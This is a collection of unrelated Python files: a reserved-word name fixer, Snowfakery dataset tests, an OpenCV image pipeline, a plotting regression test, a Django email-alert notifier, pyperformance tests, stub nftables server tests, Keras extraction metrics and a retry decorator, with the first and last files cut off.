lam = {'CamelCase': lambda: inflection.camelize(self.name),
'camelCase': lambda: inflection.camelize(self.name, False),
'snake_case': lambda: inflection.underscore(self.name)}\
.get(name)
if lam:
return NamedElement.__fixup_name(lam())
try:
return super(NamedElement, self).__getattribute__(name)
except e:
raise AttributeError("Attribute '%s' not found in %s.NamedElement"
% (name, self.__module__))
""" Some names are reserved in some languages. Fixup names to avoid using
reserved words.
"""
@staticmethod
def __fixup_name(name):
# List of reserved words from http://en.cppreference.com/w/cpp/keyword
cppReserved = frozenset({
"alignas", "alignof", "and", "and_eq", "asm", "auto",
"bitand", "bitor", "bool", "break", "case", "catch", "char",
"char16_t", "char32_t", "class", "compl", "const",
"constexpr", "const_cast", "continue", "decltype", "default",
"delete", "do", "double", "dynamic_cast", "else", "enum",
"explicit", "export", "extern", "false", "float", "for",
"friend", "goto", "if", "inline", "int", "long", "mutable",
"namespace", "new", "noexcept", "not", "not_eq", "nullptr",
"operator", "or", "or_eq", "private", "protected", "public",
"register", "reinterpret_cast", "return", "short", "signed",
"sizeof", "static", "static_assert", "static_cast", "struct",
"switch", "template", "this", "thread_local", "throw", "true",
"try", "typedef", "typeid", "typename", "union", "unsigned",
"using", "virtual", "void", "volatile", "wchar_t", "while",
"xor", "xor_eq"})
while(name in cppReserved):
name = name + "_"
return name
|
11520277
|
from pathlib import Path
from io import StringIO
from unittest import mock
import pytest
from snowfakery.data_generator import generate
from snowfakery import data_gen_exceptions as exc
from snowfakery.standard_plugins.datasets import SQLDatasetRandomPermutationIterator
class TestExternalDatasets:
def test_csv_dataset_linear(self, generated_rows):
abs_path = str(Path(__file__).parent)
yaml = (
"""
- plugin: snowfakery.standard_plugins.datasets.Dataset
- object: XXX
count: 10
fields:
__address_from_csv:
Dataset.iterate:
dataset: %s/../examples/datasets/addresses.csv
City: ${{__address_from_csv.City}}
"""
% abs_path
)
generate(StringIO(yaml), {})
assert generated_rows.row_values(0, "City") == "Burnaby"
assert generated_rows.row_values(1, "City") == "White Rock"
# wraps around:
assert generated_rows.row_values(7, "City") == "White Rock"
assert generated_rows.row_values(8, "City") == "Richmond"
def test_SQL_dataset_linear(self, generated_rows):
abs_path = str(Path(__file__).parent)
yaml = (
"""
- plugin: snowfakery.standard_plugins.datasets.Dataset
- object: XXX
count: 10
fields:
__name_from_db:
Dataset.iterate:
dataset: sqlite:///%s/databases/test_db.db
FirstName: ${{__name_from_db.first_name}}
LastName: ${{__name_from_db.last_name}}
"""
% abs_path
)
generate(StringIO(yaml), {})
assert generated_rows.row_values(0, "FirstName") == "Test"
assert generated_rows.row_values(0, "LastName") == "User"
assert generated_rows.row_values(1, "FirstName") == "Zest"
# wraps around:
assert generated_rows.row_values(7, "FirstName") == "Test"
assert generated_rows.row_values(7, "LastName") == "User"
assert generated_rows.row_values(8, "FirstName") == "Zest"
def test_csv_dataset_permutation(self, generated_rows):
abs_path = str(Path(__file__).parent)
yaml = (
"""
- plugin: snowfakery.standard_plugins.datasets.Dataset
- object: XXX
count: 14
fields:
__address_from_csv:
Dataset.shuffle:
dataset: %s/../examples/datasets/addresses.csv
City: ${{__address_from_csv.City}}
"""
% abs_path
)
generate(StringIO(yaml), {})
first_3 = [generated_rows.row_values(i, "City") for i in range(0, 3)]
assert len(first_3) == len(set(first_3)) # 3 unique items, in some order
next_3 = [generated_rows.row_values(i, "City") for i in range(3, 14)]
assert set(first_3) == set(next_3)
def test_SQL_dataset_permutation(self, generated_rows):
abs_path = str(Path(__file__).parent)
yaml = (
"""
- plugin: snowfakery.standard_plugins.datasets.Dataset
- object: XXX
count: 14
fields:
__name_from_db:
Dataset.shuffle:
dataset: sqlite:///%s/databases/test_db.db
table: contacts
FirstName: ${{__name_from_db.first_name}}
LastName: ${{__name_from_db.last_name}}
"""
% abs_path
)
generate(StringIO(yaml), {})
first_7 = [generated_rows.row_values(i, "FirstName") for i in range(0, 7)]
assert len(first_7) == len(set(first_7)) # 7 unique items, in some order
next_7 = [generated_rows.row_values(i, "FirstName") for i in range(7, 14)]
assert set(first_7) == set(next_7)
def test_SQL_dataset_permutation_really_shuffles(self, generated_rows):
abs_path = str(Path(__file__).parent)
yaml = (
"""
- plugin: snowfakery.standard_plugins.datasets.Dataset
- object: XXX
count: 14
fields:
__name_from_db:
Dataset.shuffle:
dataset: sqlite:///%s/databases/test_db.db
table: contacts
FirstName: ${{__name_from_db.first_name}}
LastName: ${{__name_from_db.last_name}}
"""
% abs_path
)
orig_query = SQLDatasetRandomPermutationIterator.query
called = None
def new_query(self):
nonlocal called
called = True
return orig_query(self)
with mock.patch(
"snowfakery.standard_plugins.datasets.SQLDatasetRandomPermutationIterator.query",
new_query,
):
generate(StringIO(yaml), {})
assert called
def test_csv_missing(self):
abs_path = str(Path(__file__).parent)
yaml = (
"""
- plugin: snowfakery.standard_plugins.datasets.Dataset
- object: XXX
fields:
__address_from_csv:
Dataset.iterate:
dataset: %s/test_csv_missing.csv
"""
% abs_path
)
with pytest.raises(exc.DataGenError) as e:
generate(StringIO(yaml), {})
assert "File not found" in str(e.value)
def test_csv_wrong_name(self):
abs_path = str(Path(__file__).parent)
yaml = (
"""
- plugin: snowfakery.standard_plugins.datasets.Dataset
- object: XXX
fields:
__address_from_csv:
Dataset.iterate:
dataset: %s/test_external_datasets.py
"""
% abs_path
)
with pytest.raises(exc.DataGenError) as e:
generate(StringIO(yaml), {})
assert "Filename extension must be .csv" in str(e.value)
def test_csv_bad_column_name(self):
abs_path = str(Path(__file__).parent)
yaml = (
"""
- plugin: snowfakery.standard_plugins.datasets.Dataset
- object: XXX
fields:
__address_from_csv:
Dataset.iterate:
dataset: %s/badcsv.csv
foo: ${{__address_from_csv.name}}
"""
% abs_path
)
with pytest.raises(exc.DataGenError) as e:
generate(StringIO(yaml), {})
assert "'xname ', 'fake'" in str(e.value)
def test_csv_utf_8_bom(self, generated_rows):
abs_path = Path(__file__).parent
yaml = (
"""
- plugin: snowfakery.standard_plugins.datasets.Dataset
- object: XXX
fields:
__address_from_csv:
Dataset.iterate:
dataset: %s/utf_8_bom_csv.csv
foo: ${{__address_from_csv.name}}
"""
% abs_path
)
with (abs_path / "utf_8_bom_csv.csv").open("rb") as f:
assert f.read(10).startswith(b"\xef\xbb\xbf")
generate(StringIO(yaml), {})
assert generated_rows.table_values("XXX", 1, "foo") == "Afghanistan"
def test_SQL_dataset_bad_tablename(self, generated_rows):
abs_path = str(Path(__file__).parent)
yaml = (
"""
- plugin: snowfakery.standard_plugins.datasets.Dataset
- object: XXX
count: 14
fields:
__name_from_db:
Dataset.iterate:
dataset: sqlite:///%s/databases/test_db.db
table: xyzzy
FirstName: ${{__name_from_db.first_name}}
LastName: ${{__name_from_db.last_name}}
"""
% abs_path
)
with pytest.raises(exc.DataGenError) as e:
generate(StringIO(yaml), {})
assert "Cannot find table: xyzzy" in str(e.value)
def test_SQL_dataset_missing_table(self, generated_rows):
yaml = """
- plugin: snowfakery.standard_plugins.datasets.Dataset
- object: XXX
fields:
__name_from_db:
Dataset.iterate:
dataset: sqlite:///tests/databases/missing_db.db
"""
with pytest.raises(exc.DataGenError) as e:
generate(StringIO(yaml), {})
assert "no tables" in str(e.value)
def test_SQL_dataset_missing_file(self, generated_rows):
yaml = """
- plugin: snowfakery.standard_plugins.datasets.Dataset
- object: XXX
fields:
__name_from_db:
Dataset.iterate:
dataset: sqlite:////xxxxyzzz/missing_db.db
"""
with pytest.raises(exc.DataGenError) as e:
generate(StringIO(yaml), {})
assert "unable to open database file" in str(e.value)
def test_SQL_dataset_multitable_file(self, generated_rows):
abs_path = str(Path(__file__).parent)
yaml = (
"""
- plugin: snowfakery.standard_plugins.datasets.Dataset
- object: XXX
count: 14
fields:
__name_from_db:
Dataset.iterate:
dataset: sqlite:///%s/databases/multitable.db
FirstName: ${{__name_from_db.first_name}}
LastName: ${{__name_from_db.last_name}}
"""
% abs_path
)
with pytest.raises(exc.DataGenError) as e:
generate(StringIO(yaml), {})
assert "multiple tables in it" in str(e.value)
def test_datasets_example(self, capsys, caplog):
"""Datasets can output warnings if they don't close properly.
This test checks that they DO close properly and DO NOT output warnings."""
with open(
Path(__file__).parent.parent / "examples/datasets/datasets.recipe.yml"
) as f:
generate(f, {})
assert capsys.readouterr().err == ""
assert caplog.text == ""
|
11520305
|
import infrastructure.intake as intake
import infrastructure.log as log
import core.vision as vision
import numpy as np
import cv2
def run(img, logOn=True):
white_balanced_image = vision.white_balance(img)
hsv = cv2.cvtColor(white_balanced_image, cv2.COLOR_BGR2HSV)
if logOn: log.hsvOrGreyImage(hsv)
edges = vision.find_edges(hsv)
if logOn: log.hsvOrGreyImage(edges)
paper_contour = vision.find_paper(edges)
if logOn: log.hsvOrGreyImage(hsv, contours=[paper_contour])
extracted = vision.extract_paper(hsv, paper_contour)
if logOn: log.hsvOrGreyImage(extracted)
return extracted
def sample():
return intake.image_file("input/grid_drawing.jpg")
|
11520320
|
import os, sys, vcs.testing.regression as regression
import vcs
from vcsaddons import EzTemplate
import cdms2,vcs,sys
## 12 plots 1 legend per row on the right
## Initialize VCS
x = vcs.init()
x.drawlogooff()
bg = True
M = EzTemplate.Multi(rows=4,columns=3)
M.legend.direction='vertical'
for i in range(12):
t=M.get(legend='local')
if i%3 !=2:
t.legend.priority=0 # Turn off legend
fnm = "test_12_plot_one_leg_per_row_right.png"
M.preview(fnm,bg=bg)
ret = regression.check_result_image(fnm, sys.argv[1])
if not bg:
raw_input("Press Enter")
sys.exit(ret)
|
11520358
|
import logging
from datetime import timedelta, datetime
from typing import Optional, List
from django.conf import settings
from django.contrib.auth.models import User
from django.template.loader import get_template
from django.utils import timezone
from django.utils.translation import gettext as _
from elasticsearch_dsl import Q
from html2text import html2text
from mainapp.functions.mail import send_mail
from mainapp.functions.search import MainappSearch, parse_hit
from mainapp.functions.search_notification_tools import search_result_for_notification
from mainapp.models import UserAlert
logger = logging.getLogger(__name__)
class NotifyUsers:
fallback_timeframe = timedelta(days=14)
def __init__(
self, override_since: Optional[datetime] = None, simulate: bool = False
):
self.override_since = override_since
self.simulate = simulate
def perform_search(self, alert: UserAlert) -> List[dict]:
if self.override_since is not None:
since = self.override_since
elif alert.last_match is not None:
since = alert.last_match
else:
since = timezone.now() - self.fallback_timeframe
search = MainappSearch(
alert.get_search_params(),
extra_filter=[Q("range", modified={"gte": since.isoformat()})],
)
executed = search.execute()
return [parse_hit(hit) for hit in executed.hits]
def notify_user(self, user: User) -> bool:
context = {
"base_url": settings.ABSOLUTE_URI_BASE,
"site_name": settings.TEMPLATE_META["logo_name"],
"alerts": [],
"email": user.email,
}
for alert in user.useralert_set.all():
notify_objects = self.perform_search(alert)
for obj in notify_objects:
search_result_for_notification(obj)
if len(notify_objects) > 0:
results = []
for obj in notify_objects:
results.append(search_result_for_notification(obj))
context["alerts"].append({"title": str(alert), "results": results})
logger.debug("User %s: %i results\n" % (user.email, len(context["alerts"])))
if len(context["alerts"]) == 0:
return False
message_html = get_template("email/user-alert.html").render(context)
message_html = message_html.replace("<mark>", "<mark>").replace(
"</mark>", "</mark>"
)
message_text = html2text(message_html)
if self.simulate:
logging.info(message_text)
else:
# TODO: When this is called by cron it shouldn't write to stdout
logger.info("Sending notification to: %s" % user.email)
send_mail(
user.email,
settings.PRODUCT_NAME + ": " + _("New search results"),
message_text,
message_html,
user.profile,
)
if not self.override_since:
for alert in user.useralert_set.all():
alert.last_match = timezone.now()
alert.save()
return True
def notify_all(self):
alerts_send = 0
users = User.objects.filter(is_active=True).all()
for user in users:
alert_send = self.notify_user(user)
if alert_send:
alerts_send += 1
logger.info(f"Sent notifications to {alerts_send} users")
|
11520362
|
import os
import os.path
import shutil
import sys
import textwrap
import unittest
import pyperformance
from pyperformance import tests
class FullStackTests(tests.Functional, unittest.TestCase):
maxDiff = 80 * 100
@classmethod
def setUpClass(cls):
# pyperformance must be installed in order to run,
# so we make sure it is.
cls.ensure_venv()
cls.ensure_pyperformance()
super().setUpClass()
@classmethod
def ensure_pyperformance(cls):
ec, stdout, _ = cls.run_python(
os.path.join(tests.DATA_DIR, 'find-pyperformance.py'),
capture='stdout',
onfail='raise',
verbose=False,
)
assert ec == 0, ec
stdout = stdout.strip()
if stdout.strip():
# It is already installed.
return
print('#'*40)
print('# installing pyperformance into the venv')
print('#'*40)
print()
# Install it.
reporoot = os.path.dirname(pyperformance.PKG_ROOT)
# XXX Ignore the output (and optionally log it).
ec, _, _ = cls.run_pip('install', '--editable', reporoot)
assert ec == 0, ec
# Clean up extraneous files.
egg_info = "pyperformance.egg-info"
print(f"(tests) Remove directory {egg_info}", flush=True)
try:
shutil.rmtree(egg_info)
except FileNotFoundError:
pass
print()
print('#'*40)
print('# DONE: installing pyperformance into the venv')
print('#'*40)
print()
def run_pyperformance(self, cmd, *args,
exitcode=0,
capture='both',
verbose=True,
):
ec, stdout, stderr = self.run_module(
'pyperformance', cmd, *args,
capture=capture,
onfail=None,
verbose=verbose,
)
if exitcode is True:
self.assertGreater(ec, 0, repr(stdout))
else:
self.assertEqual(ec, exitcode, repr(stdout))
if stdout:
stdout = stdout.rstrip()
return stdout
###################################
# info
def test_list(self):
# XXX Capture and check the output.
self.run_pyperformance('list', capture=None)
def test_list_groups(self):
# XXX Capture and check the output.
self.run_pyperformance('list_groups', capture=None)
###################################
# venv
def test_venv(self):
# XXX Capture and check the output.
root = self.resolve_tmp('venv', unique=True)
def div():
print()
print('---')
print()
def expect_success(*args):
text = self.run_pyperformance(
*args,
capture=None,
)
def expect_failure(*args):
text = self.run_pyperformance(
*args,
capture=None,
exitcode=1,
)
# It doesn't exist yet.
expect_success('venv', 'show', '--venv', root)
div()
# It gets created.
expect_success('venv', 'create', '--venv', root)
div()
expect_success('venv', 'show', '--venv', root)
div()
# It alraedy exists.
expect_failure('venv', 'create', '--venv', root)
div()
expect_success('venv', 'show', '--venv', root)
div()
# It gets re-created.
expect_success('venv', 'recreate', '--venv', root)
div()
expect_success('venv', 'show', '--venv', root)
div()
# It get deleted.
expect_success('venv', 'remove', '--venv', root)
div()
expect_success('venv', 'show', '--venv', root)
###################################
# run
def test_run_and_show(self):
filename = self.resolve_tmp('bench.json')
# -b all: check that *all* benchmark work
#
# --debug-single-value: benchmark results don't matter, we only
# check that running benchmarks don't fail.
# XXX Capture and check the output.
text = self.run_pyperformance(
'run',
'-b', 'all',
'--debug-single-value',
'-o', filename,
capture=None,
)
# Display slowest benchmarks
# XXX Capture and check the output.
self.run_module('pyperf', 'slowest', filename)
###################################
# compile
def ensure_cpython_repo(self, reporoot=None):
if not reporoot:
reporoot = os.environ.get('PYPERFORMANCE_TESTS_CPYTHON')
if not reporoot:
reporoot = os.path.join(tests.DATA_DIR, 'cpython')
for markerfile in [
os.path.join(reporoot, '.git'),
os.path.join(reporoot, 'Python/ceval.c'),
]:
if not os.path.exists(markerfile):
break
else:
return reporoot
# Clone the repo.
print('#'*40)
print('# cloning the cpython repo')
print('#'*40)
print()
tests.run_cmd(
shutil.which('git'),
'clone',
'https://github.com/python/cpython',
reporoot,
)
print('#'*40)
print('# DONE: cloning the cpython repo')
print('#'*40)
print()
return reporoot
def create_compile_config(self, *revisions,
outdir=None,
fast=True,
upload=None,
):
if not outdir:
outdir = self.resolve_tmp('compile-cmd-outdir', unique=True)
cpython = self.ensure_cpython_repo()
text = textwrap.dedent(f'''
[config]
json_dir = {outdir}
debug = {fast}
[scm]
repo_dir = {cpython}
update = False
git_remote = remotes/origin
[compile]
bench_dir = {outdir}
lto = {not fast}
pgo = {not fast}
install = True
[run_benchmark]
system_tune = False
upload = False
[upload]
url = {upload}
''')
if revisions:
text += ''.join(line + os.linesep for line in [
'',
'[compile_all_revisions]',
*(f'{r} =' for r in revisions),
])
cfgfile = os.path.join(outdir, 'compile.ini')
print(f'(writing config file to {cfgfile})')
os.makedirs(outdir, exist_ok=True)
with open(cfgfile, 'w', encoding='utf-8') as outfile:
outfile.write(text)
return cfgfile
@tests.CPYTHON_ONLY
@tests.NON_WINDOWS_ONLY
@tests.SLOW
def test_compile(self):
cfgfile = self.create_compile_config()
revision = 'a58ebcc701dd' # tag: v3.10.2
# XXX Capture and check the output.
self.run_pyperformance(
'compile', cfgfile, revision,
capture=None,
)
@tests.CPYTHON_ONLY
@tests.NON_WINDOWS_ONLY
@tests.SLOW
def test_compile_all(self):
rev1 = '2cd268a3a934' # tag: v3.10.1
rev2 = 'a58ebcc701dd' # tag: v3.10.2
cfgfile = self.create_compile_config(rev1, rev2)
# XXX Capture and check the output.
self.run_pyperformance(
'compile_all', cfgfile,
capture=None,
)
@tests.CPYTHON_ONLY
@tests.NON_WINDOWS_ONLY
@unittest.expectedFailure
def test_upload(self):
url = '<bogus>'
cfgfile = self.create_compile_config(upload=url)
resfile = os.path.join(tests.DATA_DIR, 'py36.json')
# XXX Capture and check the output.
self.run_pyperformance(
'upload', cfgfile, resfile,
capture=None,
)
###################################
# show
def test_show(self):
for filename in (
os.path.join(tests.DATA_DIR, 'py36.json'),
os.path.join(tests.DATA_DIR, 'mem1.json'),
):
with self.subTest(filename):
# XXX Capture and check the output.
self.run_pyperformance('show', filename, capture=None)
###################################
# compare
def compare(self, *args,
exitcode=0,
dataset='py',
file2='py38.json',
**kw
):
if dataset == 'mem':
file1 = 'mem1.json'
file2 = 'mem2.json'
else:
file1 = 'py36.json'
marker = file1
stdout = self.run_pyperformance(
'compare',
os.path.join(tests.DATA_DIR, file1),
os.path.join(tests.DATA_DIR, file2),
*args,
exitcode=exitcode,
verbose=False,
)
if marker in stdout:
stdout = stdout[stdout.index(marker):]
return stdout + '\n'
def test_compare(self):
stdout = self.compare()
self.assertEqual(stdout, textwrap.dedent('''
py36.json
=========
Performance version: 1.0.1
Python version: 3.6.10 (64-bit)
Report on Linux-5.5.9-200.fc31.x86_64-x86_64-with-fedora-31-Thirty_One
Number of logical CPUs: 8
Start date: 2020-03-26 15:50:39.816020
End date: 2020-03-26 15:50:56.406559
py38.json
=========
Performance version: 1.0.1
Python version: 3.8.2 (64-bit)
Report on Linux-5.5.9-200.fc31.x86_64-x86_64-with-glibc2.2.5
Number of logical CPUs: 8
Start date: 2020-03-26 15:54:12.331569
End date: 2020-03-26 15:54:23.900355
### telco ###
Mean +- std dev: 10.7 ms +- 0.5 ms -> 7.2 ms +- 0.3 ms: 1.49x faster
Significant (t=44.97)
''').lstrip())
def test_compare_wrong_version(self):
stdout = self.compare(file2='py3_performance03.json', exitcode=1)
self.assertEqual(stdout, textwrap.dedent('''
py36.json
=========
Performance version: 1.0.1
Python version: 3.6.10 (64-bit)
Report on Linux-5.5.9-200.fc31.x86_64-x86_64-with-fedora-31-Thirty_One
Number of logical CPUs: 8
Start date: 2020-03-26 15:50:39.816020
End date: 2020-03-26 15:50:56.406559
py3_performance03.json
======================
Performance version: 0.3
Skipped 1 benchmarks only in py36.json: telco
Skipped 1 benchmarks only in py3_performance03.json: call_simple
ERROR: Performance versions are different (1.0.1 != 0.3)
''').lstrip())
def test_compare_single_value(self):
stdout = self.compare(dataset='mem')
self.assertEqual(stdout, textwrap.dedent('''
mem1.json
=========
Performance version: 0.2
mem2.json
=========
Performance version: 0.2
### call_simple ###
7896.0 kB -> 7900.0 kB: 1.00x larger
''').lstrip())
def test_compare_csv(self):
expected = textwrap.dedent('''
Benchmark,Base,Changed
telco,0.01073,0.00722
''').lstrip()
filename = self.resolve_tmp('outfile.csv', unique=True)
with tests.CleanupFile(filename):
self.compare("--csv", filename)
with open(filename, "r", encoding="utf-8") as infile:
csv = infile.read()
self.assertEqual(csv, expected)
def test_compare_table(self):
stdout = self.compare("-O", "table")
self.assertEqual(stdout, textwrap.dedent('''
py36.json
=========
Performance version: 1.0.1
Python version: 3.6.10 (64-bit)
Report on Linux-5.5.9-200.fc31.x86_64-x86_64-with-fedora-31-Thirty_One
Number of logical CPUs: 8
Start date: 2020-03-26 15:50:39.816020
End date: 2020-03-26 15:50:56.406559
py38.json
=========
Performance version: 1.0.1
Python version: 3.8.2 (64-bit)
Report on Linux-5.5.9-200.fc31.x86_64-x86_64-with-glibc2.2.5
Number of logical CPUs: 8
Start date: 2020-03-26 15:54:12.331569
End date: 2020-03-26 15:54:23.900355
+-----------+-----------+-----------+--------------+-----------------------+
| Benchmark | py36.json | py38.json | Change | Significance |
+===========+===========+===========+==============+=======================+
| telco | 10.7 ms | 7.22 ms | 1.49x faster | Significant (t=44.97) |
+-----------+-----------+-----------+--------------+-----------------------+
''').lstrip())
def test_compare_table_single_value(self):
stdout = self.compare("-O", "table", dataset='mem')
self.assertEqual(stdout, textwrap.dedent('''
mem1.json
=========
Performance version: 0.2
mem2.json
=========
Performance version: 0.2
+-------------+-----------+-----------+--------------+------------------------------------------+
| Benchmark | mem1.json | mem2.json | Change | Significance |
+=============+===========+===========+==============+==========================================+
| call_simple | 7896.0 kB | 7900.0 kB | 1.00x larger | (benchmark only contains a single value) |
+-------------+-----------+-----------+--------------+------------------------------------------+
''').lstrip())
if __name__ == "__main__":
unittest.main()
|
11520369
|
import json
import os
import unittest
import tempfile
from flask import jsonify
import app as nftserver
from utils import nft_utils
class NFTServerCreateRuleTests(unittest.TestCase):
def setUp(self):
nftserver.app.config['TESTING'] = True
self.app = nftserver.app.test_client()
def tearDown(self):
cmd = nft_utils.nft_command('flush ruleset')
nft_utils.close_nft_command(cmd)
def test_rule_creation_with_match(self):
assert True
def test_rule_creation_with_set(self):
assert True
def test_rule_creation_with_dictionary(self):
assert True
def test_no_rule_creation_with_empty_chain(self):
assert True
def test_no_rule_creation_with_nonexistent_chain(self):
assert True
def test_no_rule_creation_with_empty_expression(self):
assert True
def test_no_rule_creation_with_invalid_expression(self):
assert True
def test_no_rule_creation_with_empty_key(self):
assert True
def test_no_rule_creation_with_invalid_key(self):
assert True
def test_no_rule_creation_with_empty_statements(self):
assert True
def test_no_rule_creation_with_statement_with_empty_match(self):
assert True
def test_no_rule_creation_with_statement_with_invalid_match(self):
assert True
def test_no_rule_creation_with_statement_with_empty_action(self):
assert True
def test_no_rule_creation_with_statement_with_invalid_action(self):
assert True
class NFTServerListRuleTests(unittest.TestCase):
def setUp(self):
nftserver.app.config['TESTING'] = True
self.app = nftserver.app.test_client()
def tearDown(self):
cmd = nft_utils.nft_command('flush ruleset')
nft_utils.close_nft_command(cmd)
def test_list_all_rules(self):
assert True
def test_list_single_rule(self):
assert True
class NFTServerDeleteRuleTests(unittest.TestCase):
def setUp(self):
nftserver.app.config['TESTING'] = True
self.app = nftserver.app.test_client()
def tearDown(self):
cmd = nft_utils.nft_command('flush ruleset')
nft_utils.close_nft_command(cmd)
def test_rule_deletion(self):
assert True
if __name__ == '__main__':
unittest.main()
|
11520419
|
import logging
from typing import List
import numpy as np
import tensorflow as tf
from transformers_keras.common.metrics import ExactMatch, F1ForSequence
from transformers_keras.datapipe.sa_dataset import DatasetForAspectTermExtraction, ExampleForAspectTermExtraction
class BaseMetricForAspectTermExtraction(tf.keras.callbacks.Callback):
"""Base metric for ATE"""
@classmethod
def from_jsonl_files(cls, input_files, limit=None, **kwargs):
examples = DatasetForAspectTermExtraction.jsonl_to_examples(input_files, **kwargs)
if limit is not None and limit > 0:
examples = examples[:limit]
return cls(examples, **kwargs)
def __init__(self, examples: List[ExampleForAspectTermExtraction], **kwargs):
super().__init__()
self.examples = examples
self.dataset = DatasetForAspectTermExtraction.from_examples(self.examples, **kwargs)
def on_epoch_end(self, epoch, logs=None):
outputs = self.model.predict(self.dataset)
all_start_ids, all_end_ids = outputs[0], outputs[1]
pred_spans_list, gold_spans_list = [], []
for start_ids, end_ids, example in zip(all_start_ids, all_end_ids, self.examples):
start_ids, end_ids = np.argmax(start_ids, axis=-1), np.argmax(end_ids, axis=-1)
pred_spans_list.append(self._decode_spans(start_ids.tolist(), end_ids.tolist(), example))
gold_spans_list.append(self._decode_spans(example.start_ids, example.end_ids, example))
self._compute_metric(gold_spans_list, pred_spans_list, epoch=epoch)
def _compute_metric(self, gold_spans_list, pred_spans_list, epoch=0):
pass
def _decode_spans(self, start_ids, end_ids, example):
spans = []
span = []
for idx, (start, end) in enumerate(zip(start_ids, end_ids)):
if start == 1:
span = [idx]
if span and end == 1:
span.append(idx)
spans.append("".join([str(x).lstrip("##") for x in example.tokens[span[0] : span[1] + 1]]))
span = []
return spans
class EMForAspectTermExtraction(BaseMetricForAspectTermExtraction):
"""EM for ATE"""
def __init__(self, examples: List[ExampleForAspectTermExtraction], **kwargs) -> None:
super().__init__(examples, **kwargs)
self.em = ExactMatch()
def _compute_metric(self, gold_spans_list, pred_spans_list, epoch=0):
score = self.em(gold_spans_list, pred_spans_list, dim=2)
logging.info("Epoch: %d, EM: %.6f", epoch, score)
tf.summary.scalar("EM", score, description="EM score")
class F1ForAspectTermExtraction(BaseMetricForAspectTermExtraction):
"""F1 for ATE"""
def __init__(self, examples: List[ExampleForAspectTermExtraction], split_whitespace=False, **kwargs):
super().__init__(examples, **kwargs)
self.split_whitespace = split_whitespace
self.f1 = F1ForSequence()
def _compute_metric(self, gold_spans_list, pred_spans_list, epoch=0):
score = self.f1(gold_spans_list, pred_spans_list, dim=2, split_whitespace=self.split_whitespace)
logging.info("Epoch: %d, F1: %.6f", epoch, score)
tf.summary.scalar("F1", score, description="F1 score")
|
11520424
|
import datetime
import functools
import inspect
import random
import time
import six
_DEFAULT_RETRIES = 3
_DEFAULT_DELAY_INITIAL = 0.1
_DEFAULT_DELAY_MULTIPLIER = 2.0
_DEFAULT_DELAY_MAXIMUM = 60
_DEFAULT_DELAY_JITTER = (0, 1)
_SAFE_VALID_ASSIGNMENTS = ("__doc__",)
def _name_of_func(f):
module = inspect.getmodule(f)
if module is not None:
module = module.__name__
else:
module = "<unknown>"
return "{}.{}".format(module, getattr(f, "__name__", f))
class Retry(object):
"""
Retry class to wrap functions as a decorator or inline.
Example
-------
>>> import descarteslabs as dl
>>> retry = dl.common.retry.Retry(
... maximum=30,
... retries=5,
... exceptions=(dl.client.exceptions.GatewayTimeoutError,)
... )
>>> @retry
... def flaky(x):
... return x
>>> flaky("test")
'test'
>>> retry(lambda x: x)("test")
'test'
"""
def __init__(
self,
retries=_DEFAULT_RETRIES,
exceptions=None,
predicate=None,
blacklist=None,
deadline=None,
initial=_DEFAULT_DELAY_INITIAL,
maximum=_DEFAULT_DELAY_MAXIMUM,
jitter=_DEFAULT_DELAY_JITTER,
multiplier=_DEFAULT_DELAY_MULTIPLIER,
):
"""
Instantiate a Retry object that can be used to wrap a callable.
Parameters
----------
retries : int, optional
The number of retries allowed.
exceptions : tuple, optional
A tuple of Exceptions that should always be retried.
predicate : function, optional
A callable that takes an exception and returns true if retryable.
This can be used for cases where a generic exception with variable
attributes.
blacklist : tuple, optional
A tuple of Exceptions that should never be retried.
deadline : float, optional
The deadline in seconds for retries.
initial : float
The amount of delay for the before the first retry.
maximum : float
The maximum amount of delay between retries.
jitter : tuple, optional
The bounds for a random amount to be added to each delay.
multiplier : float, optional
The multiple by which the delay increases.
"""
self._retries = retries
self._exceptions = exceptions
self._predicate = predicate
self._blacklist = blacklist
self._deadline = deadline
self._initial = initial
self._maximum = maximum
self._jitter = jitter
self._multiplier = multiplier
def __call__(self, func):
@_wraps(func)
def wrapper(*args, **kwargs):
target = functools.partial(func, *args, **kwargs)
delay_generator = truncated_delay_generator(
initial=self._initial,
maximum=self._maximum,
jitter=self._jitter,
multiplier=self._multiplier,
)
return self._retry(target, delay_generator)
return wrapper
def _retry(self, func, delay_generator):
deadline = self._deadline_datetime(self._deadline)
retries = self._retries
previous_exceptions = []
for delay in delay_generator:
try:
return func()
except Exception as e:
self._handle_exception(e, previous_exceptions)
# will raise RetryError if deadline or retries exceeded
retries = self._check_retries(
retries, _name_of_func(func), deadline, previous_exceptions
)
time.sleep(delay)
else:
raise ValueError("Bad delay generator")
def _handle_exception(self, exception, previous_exceptions):
if callable(self._predicate) and not self._predicate(exception):
raise
if self._blacklist is not None and isinstance(exception, self._blacklist):
raise
if self._exceptions is not None and not isinstance(exception, self._exceptions):
raise
previous_exceptions.append(exception)
def _check_retries(self, retries, name, deadline, previous_exceptions):
# Raise RetryError if deadline exceeded
if deadline is not None and deadline <= datetime.datetime.utcnow():
six.raise_from(
RetryError(
"Deadline of {:.1f}s exceeded while calling {}".format(
deadline, name
),
previous_exceptions,
),
previous_exceptions[-1],
)
# Raise RetryError if retries exhausted
if retries is not None and retries == 0:
six.raise_from(
RetryError(
"Maximum retry attempts calling {}".format(name),
previous_exceptions,
),
previous_exceptions[-1],
)
if retries is not None:
retries -= 1
return retries
@staticmethod
def _deadline_datetime(deadline):
if deadline is None:
return None
return datetime.datetime.utcnow() + datetime.timedelta(seconds=deadline)
class RetryError(Exception):
"""
Error raised when the number of retries has been exhausted or the
deadline has passed.
"""
def __init__(self, message, exceptions):
super(RetryError, self).__init__(message)
self.message = message
self._exceptions = exceptions
@property
def exceptions(self):
"""
Get a list of exceptions that occurred.
Returns
-------
list
The list of exceptions
"""
return self._exceptions
def __str__(self):
return "{}, exceptions: {}".format(self.message, self.exceptions)
def truncated_delay_generator(
initial=None, maximum=None, jitter=None, multiplier=_DEFAULT_DELAY_MULTIPLIER
):
"""
A generator for truncated exponential delay.
Parameters
----------
initial : float
The amount of delay for the first generated value.
maximum : float
The maximum amount of delay.
jitter : tuple, optional
The bounds for a random amount to be added to each delay.
multiplier : float, optional
The multiple by which the delay increases.
"""
if initial is None:
initial = _DEFAULT_DELAY_INITIAL
delay = initial
while True:
if jitter is not None:
delay += random.uniform(*jitter)
if maximum is not None:
delay = min(delay, maximum)
yield delay
delay *= multiplier
def _wraps(wrapped):
"""
A helper that handles functions not having all attributes in Python 2.
"""
if isinstance(wrapped, functools.partial) or not hasattr(wrapped, "__name__"):
